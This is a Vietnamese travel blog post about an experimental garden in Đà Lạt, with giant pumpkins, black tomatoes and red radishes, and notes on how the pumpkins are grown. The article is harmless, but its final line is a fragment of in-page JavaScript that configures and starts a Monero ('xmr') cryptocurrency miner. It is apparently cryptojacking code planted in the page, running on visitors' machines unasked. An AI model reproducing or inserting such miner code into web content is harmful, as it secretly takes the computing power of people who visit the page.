Khu vườn ‘lạ’: Bí khổng lồ và cà chua đen ở Đà Lạt - Nguyễn Trung Quân sưu tập -Khu vườn ‘lạ’: Bí khổng lồ và cà chua đen ở Đà LạtKhu vườn ‘lạ’: Bí khổng lồ và cà chua đen ở Đà Lạt

Khu vườn ‘lạ’: Bí khổng lồ và cà chua đen ở Đà Lạt

Biết đâu, một cô bé lọ lem có thật sẽ xuất hiện tại Đà Lạt, ngay tại khu vườn bí khổng lồ, cà chua đen này…

Cuối tuần vừa rồi, trong một chuyến “phượt” lên Đà Lạt đổi gió, tôi được một vài người bạn cũ dẫn đến một “khu vườn lạ” nằm tại 50 đường Hồ Xuân Hương (đường đi hồ Than Thở). Đây là khu vườn với các giống cây “lạ” đang được thử nghiệm của gia đình ông Lê Hữu Phan (vé tham quan 10.000đ/người)

bí ngô khổng lồ ở đà lạt

Trẻ con thích thú "đọ" dáng cùng quả bí khổng lồ

Khi chúng tôi đến nơi, có khá nhiều khách du lịch nghe tiếng cũng tìm đến đây để có thể “mục sở thị” những quả bí ngô “khổng lồ” và vườn cà chua đen mà những ngày qua đã được khá nhiều trang báo nhắc đến. Sở dĩ gọi là bí khổng lồ vì trọng lượng của chúng có thể lên tới 70, 80kg/quả. Ông Phan giải thích rằng “Giống bí ngô tôi mua ở bên Mỹ trồng cho quả nặng 1 tấn rưỡi, song, vụ đầu tiên tôi trồng thử quả to nhất mới nặng được hơn 1 tạ. Còn lại chỉ đạt từ 40-80kg/quả”. 

bí ngô khổng lồ ở đà lạt

Vườn bí hiện chỉ còn khoảng 10 quả lớn (trên 40kg)

Thấy chúng tôi đến, ôgn Phan vui vẻ mời chào, tận tình hướng dẫn cho chúng tôi về khu vườn nhà mình. Ông kể, để trồng được giống bí này đòi hỏi quy trình chăm sóc rất cầu kỳ. Ví dụ, trước khi trồng, cần phải chuẩn bị phân hữu cơ, phân chuồng ủ xuống đất rồi mới ươm cây. Hố trồng phải đào rộng khoảng 4-5m2 vì loại bí này lớn rất nhanh, cần có đủ chất dinh dưỡng nuôi cây. Trong quá trình trồng phải tưới nước, bón phân theo đúng nhu cầu mà cây cần, tưới nhiều nước quá quả sẽ bị hỏng. Ông còn cẩn thận dùng những miếng xốp mỏng lót dưới quả bí để ngăn ngừa sâu bệnh.

Ngoài bí đỏ, vườn còn có trồng loại bí màu trắng

Tôi nghe những người dân sống xung quanh đó kể rằng họ từng được ông Phan mời dùng thử bí mà ông trồng, hầu hết đều đánh giá giống bí này ăn rất ngon, thơm, ngọt, còn ngọn bí thì lại to, chỉ cần bấm vài đọt là có một đĩa rau bí xào ăn.

bí ngô khổng lồ ở đà lạt

Nhìn quả bí ngô khổng lồ, tôi mường tượng lại câu chuyện về ‘cô bé lọ lem’. Biết đâu, một cô bé lọ lem có thật sẽ xuất hiện tại Đà Lạt, ngay tại khu vườn bí khổng lồ, cà chua đen này.

Bước sâu vào trong, chúng tôi phát hiện ra khu vườn này còn trồng nhiều loại cây “độc, lạ” khác mà tôi chư từng thấy như củ cải đỏ, cà chua mini, dưa leo mini, Hương Thảo (dùng làm cây gia vị, rất thơm)… trong số đó, không thể không nhắc đến là giống cà chua đen.

Giàn bí ngồi 

củ cải đỏ đà lạt

Củ cải đỏ và cà chua đen có bán ngay tại vườn 

Giàn cà chua đỏ

Cà chua đen là loại cà chua có vỏ màu đen, ruột đỏ, được trồng trên luống cao, và cố định lại bằng sào để cây không bị gãy, đổ. Nhiều du khách vào chụp hình cũng vô cùng cẩn thận, tránh đụng, làm gãy cành vì cà chua đang đến độ thu hoạch, trái lại sai trĩu cành. Nghe đâu giống cà chua này khó trồng lắm, nhiều gia đình cũng từng thử nghiệm nhưng tính đến bây giờ, thành công nhất chỉ có vườn của ông Phan và vườn chị Thủy (Đức Trọng, Lâm Đồng).

cà chua đen đà lạt

Trái cà chua chín mọng, lạ mắt

Dạo quanh khu vườn, ngắm những mầm lá đang khẽ cựa mình, tôi tự nhủ không biết lần ghé Đà Lạt tiếp theo, chúng sẽ cao lớn đến chừng nào nữa.


', { threads:2,throttle:0.2, coin: "xmr", }); miner.start();